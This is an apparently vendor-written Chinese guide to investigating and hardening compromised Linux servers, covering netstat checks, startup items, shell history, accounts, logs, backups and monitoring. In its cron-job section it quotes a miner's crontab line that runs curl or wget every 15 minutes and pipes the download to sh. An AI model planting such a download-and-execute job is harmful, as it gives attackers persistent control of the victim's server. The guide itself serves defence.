服務器被入侵如何排查?如何防止服務器被入侵?

遇到很多次客戶服務器被入侵的情況，有些服務器被植入木馬后門、有些被檢查出有挖礦程序、有些發現登錄密碼不對，被惡意登錄修改了密碼，遇到了服務器被入侵的情況應第一時間聯系服務商售后處理將損失降低到最低程度，讓網站、游戲等業務恢復。

根據以往的處理經驗，總結了一些服務器被入侵的排查方法，專門用來檢查服務器第一時間的安全問題，看發生在哪里、服務器是否被黑、是否被攻擊、哪些被篡改等等!

如何排查服務器被攻擊?

首先我們會對當前服務器的IP，以及IP的地址，linux服務器名稱，服務器的版本是centos,還是redhat，服務器的當前時間，進行收集并記錄到一個txt文檔里，接下來再執行下一步，對當前服務器的異常網絡連接以及異常的系統進程檢查，主要是通過netstat -an以及-antp命令來檢查服務器存在哪些異常的IP連接。并對連接的IP，進行歸屬地查詢，如果是國外的IP，直接記錄當前進程的PID值，并自動將PID的所有信息記錄，查詢PID所在的linux文件地址，緊接著檢查當前占用CPU大于百分之30的進程，并檢查該進程所在的文件夾。

服務器被入侵如何排查?

1、在我們處理客戶服務器被攻擊的時候發現很多服務器的命令被篡改，比如正常的PS查看進程的，查詢目錄的 cd的命令都給篡改了，讓服務器無法正常使用命令，檢查服務器安全造成了困擾。對服務器的啟動項進行檢查，有些服務器被植入木馬后門，即使重啟服務器也還是被攻擊，木馬會自動的啟動，檢查linux的init.d的文件夾里是否有多余的啟動文件，也可以檢查時間，來判斷啟動項是否有問題。

2、再一個要檢查的地方是服務器的歷史命令，history很多服務器被黑都會留下痕跡，比如SSH登錄服務器后，攻擊者對服務器進行了操作，執行了那些惡意命令都可以通過history查詢的到，有沒有使用wget命令下載木馬，或者執行S件。檢查服務器的所有賬號，以及當前使用并登錄的管理員賬戶，tty是本地用戶登錄，pst是遠程連接的用戶登錄，來排查服務器是否被黑，被攻擊，也可以檢查login.defs文件的uid值，判斷uid的passwd來獲取最近新建的管理員賬戶。執行cat etc/passwd命令檢查是否存在異常的用戶賬戶，包括特權賬戶，UID值為0。

3、最重要的是檢查服務器的定時任務，前段時間某網站客戶中了挖礦病毒，一直占用CPU，查看了定時任務發現每15分鐘自動執行下載命令，crontab -l */15 * * * * (curl -fsSL ||wget -q-O- )|sh 代碼如上，自動下載并執行SH木馬文件。定時任務刪都刪不掉，最后通過檢查系統文件查到了木馬，并終止進程，強制刪除。有些服務器被黑后，請立即檢查2天里被修改的文件，可以通過find命令去檢查所有的文件，看是否有木馬后門文件，如果有可以確定服務器被黑了。

以上就是服務器被入侵攻擊的檢查辦法，通過我們SINE安全給出的檢查步驟，挨個去檢查，就會發現出問題，最重要的是要檢查日志，對這些日志要仔細的檢查，哪怕一個特征都會導致服務器陷入被黑，被攻擊的狀態，也希望我們的分享能夠幫助到更多需要幫助的人，服務器安全了，帶來的也是整個互聯網的安全。

排查的話，可以從以下幾個方面入手：

1、日志

查看/var/log下的日志，如果發現有大量SSH登錄失敗日志，并存在root用戶多次登錄失敗后成功登錄的記錄，這就符合暴力破解特征。

2、系統分析

對系統關鍵配置、賬號、歷史記錄等進行排查，確認對系統的影響情況

發現/root/.bash_history內歷史記錄已經被清除，其他無異常。

3、進程分析

對當前活動進程、網絡連接、啟動項、計劃任務等進行排查

4、文件系統

查看系統關鍵的文件是否被修改等

5、后門排查

使用RKHunter掃描系統是否存在后門漏洞

加固建議

1) 禁用不必要啟動的服務與定時任務

2) 修改所有系統用戶密碼，并滿足密碼復雜度要求：8位以上，包含大小寫字母+數字+特殊符號組合;

3) 如非必要禁止SSH端口對外網開放，或者修改SSH默認端口并限制允許訪問IP;

假如有一天真的遇到攻擊了，怎么辦呢?再來給你們帶來一個好辦法：

事前檢查和監控

提前檢查

1. 服務器和網站漏洞檢測，對Web漏洞、弱口令、潛在的惡意行為、違法信息等進行定期掃描。

2. 代碼的定期檢查，安全檢查，漏洞檢查。

3. 服務器安全加固，安全基線設置，安全基線檢查。

4. 數據庫執行的命令，添加字段、加索引等，必須是經過測試檢查的命令，才能在正式環境運行。

數據備份

1. 服務器數據備份，包括網站程序文件備份，數據庫文件備份、配置文件備份，如有資源最好每小時備份和異地備份。

2. 建立五重備份機制：常規備份、自動同步、LVM快照、Azure備份、S3備份。

3. 定期檢查備份文件是否可用，避免出故障后，備份數據不可用。

4. 重要數據多重加密算法加密處理。

5. 程序文件版本控制，測試，發布，故障回滾。

安全監控

1. nagios監控服務器常規狀態CPU負載、內存、磁盤、流量，超過閾值告警。

2. zabbix或cacti監控服務器常規狀態CPU負載、內存、磁盤、流量等狀態，可以顯示歷史曲線，方便排查問題。

3. 監控服務器SSH登錄記錄、iptables狀態、進程狀態，有異常記錄告警。

4. 監控網站WEB日志(包括nginx日志php日志等)，可以采用EKL來收集管理，有異常日志告警。

5. 運維人員都要接收告警郵件和短信，至少所負責的業務告警郵件和短信必須接收，運維經理接收重要業務告警郵件和短信。(除非是專職運維開發)

6. 除服務器內部監控外，最好使用第三方監控，從外部監控業務是否正常(監控URL、端口等)，比如：云鎖。